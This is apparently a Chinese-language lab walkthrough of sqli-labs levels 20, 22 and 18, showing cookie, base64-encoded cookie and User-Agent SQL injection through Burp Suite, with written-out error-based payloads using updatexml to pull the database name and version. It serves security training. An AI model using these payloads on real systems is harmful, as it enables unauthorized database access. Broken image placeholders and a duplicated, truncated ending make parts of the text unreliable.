- Cookie 注入,sqli-labs-20
- base64 注入,sqli-labs-22
- User-Agent 注入,sqli-labs-18
cookie注入
在第20关,随便输入用户名和密码,F12进行查看
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-OmWZvjpA-1693124618939)(https://gitee.com/JIe1207/img/raw/master/img/202308241758827.png)]
发现cookie字段,尝试使用cookie注入,在cookie内容中加入’或"查看是否会报错
但是cookie注入在hackbar中操作不方便,使用bp抓包进行注入,将bp中httphistory清空,然后在bp自带浏览器中打开sqli-labs-20,点击history点开链接
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-dGZKgTVe-1693124618940)(https://gitee.com/JIe1207/img/raw/master/img/202308241839032.png)]
ctrl+r将数据包发送重发器,使用cookie进行测试
Cookie: uname=admin'
发现有报错
Cookie: uname=admin'#
发现没有报错,
Cookie: uname=admin'and 1=1 #
Cookie: uname=admin'and 1=2 #
无报错,可知布尔型状态不能干扰
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-S1VFPiJq-1693124618943)(https://gitee.com/JIe1207/img/raw/master/img/202308241855771.png)]
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-FLFkVbAk-1693124618943)(https://gitee.com/JIe1207/img/raw/master/img/202308241856106.png)]
之前发现有报错使用报错注入进行查询数据库名和数据库版本
Cookie: uname=admin'and updatexml(1,concat(0x7e,(select database()),0x7e),1) #
Cookie: uname=admin'and updatexml(1,concat(0x7e,(select version()),0x7e),1) #
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-AHrIZy2k-1693124618944)(https://gitee.com/JIe1207/img/raw/master/img/202308241906328.png)]
base64 注入
sqli-labs-22
账户密码使用dumb登录
使用bp抓包,将数据包发送重发器
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-5XMpmFN8-1693124618945)(https://gitee.com/JIe1207/img/raw/master/img/202308241917267.png)]
因为发现cookie中是url编码,点击decoder将内容解密,先使用url进行解密,得到结果发现是base64编码特征,使用base64进行解密得出结果
使用dumb进行注入,发现报错
使用base64编码进行注入,页面正常
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-AOHDpRfp-1693124618947)(https://gitee.com/JIe1207/img/raw/master/img/202308241925565.png)]
dumb’进行编码,无报错
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Xl2vX0Dj-1693124618948)(https://gitee.com/JIe1207/img/raw/master/img/202308241931067.png)]
dumb"进行编码,有报错
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-4zViZgxP-1693124618948)(https://gitee.com/JIe1207/img/raw/master/img/202308241929804.png)]
那么使用dumb" #查看
使用报错注入,将命令进行base64编码
查询结果
User-Agent 注入
sqli-labs-18
账户密码使用dumb进行登录
将数据包发送重发器
将UA进行替换,
添加单引号,发现有报错但无法确定闭合
猜测是单引号,但还是报错了
给代码中前后单引号都进行配对,闭合无报错
因为刚才有报错,可以使用报错注入
User-Agent:XUJIE' and updatexml(1,concat(0x7e,(select database()),0x7e),1) and '1'='1 #
cg6Si6-1693124618953)]
因为刚才有报错,可以使用报错注入
User-Agent:XUJIE' and updatexml(1,concat(0x7e,(select database()),0x7e),1) and '1'='1 #